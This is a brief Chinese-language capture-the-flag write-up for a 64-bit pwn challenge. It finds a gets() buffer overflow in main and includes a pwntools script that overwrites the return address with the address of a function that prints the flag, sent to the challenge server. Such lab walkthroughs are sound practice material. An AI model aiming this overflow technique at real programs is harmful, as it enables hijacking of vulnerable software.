先checksec 是64位,小端序
进入ida,查看字符串
有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag
一如既往的来到了main 函数处,
也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出
脚本
from pwn import*
r=remote(‘node3.buuoj.cn’,28011)
flag_addr = 0x40060D
payload = ‘a’*(0x40+8)+p64(flag_addr)
r.sendline(payload)
r.interactive()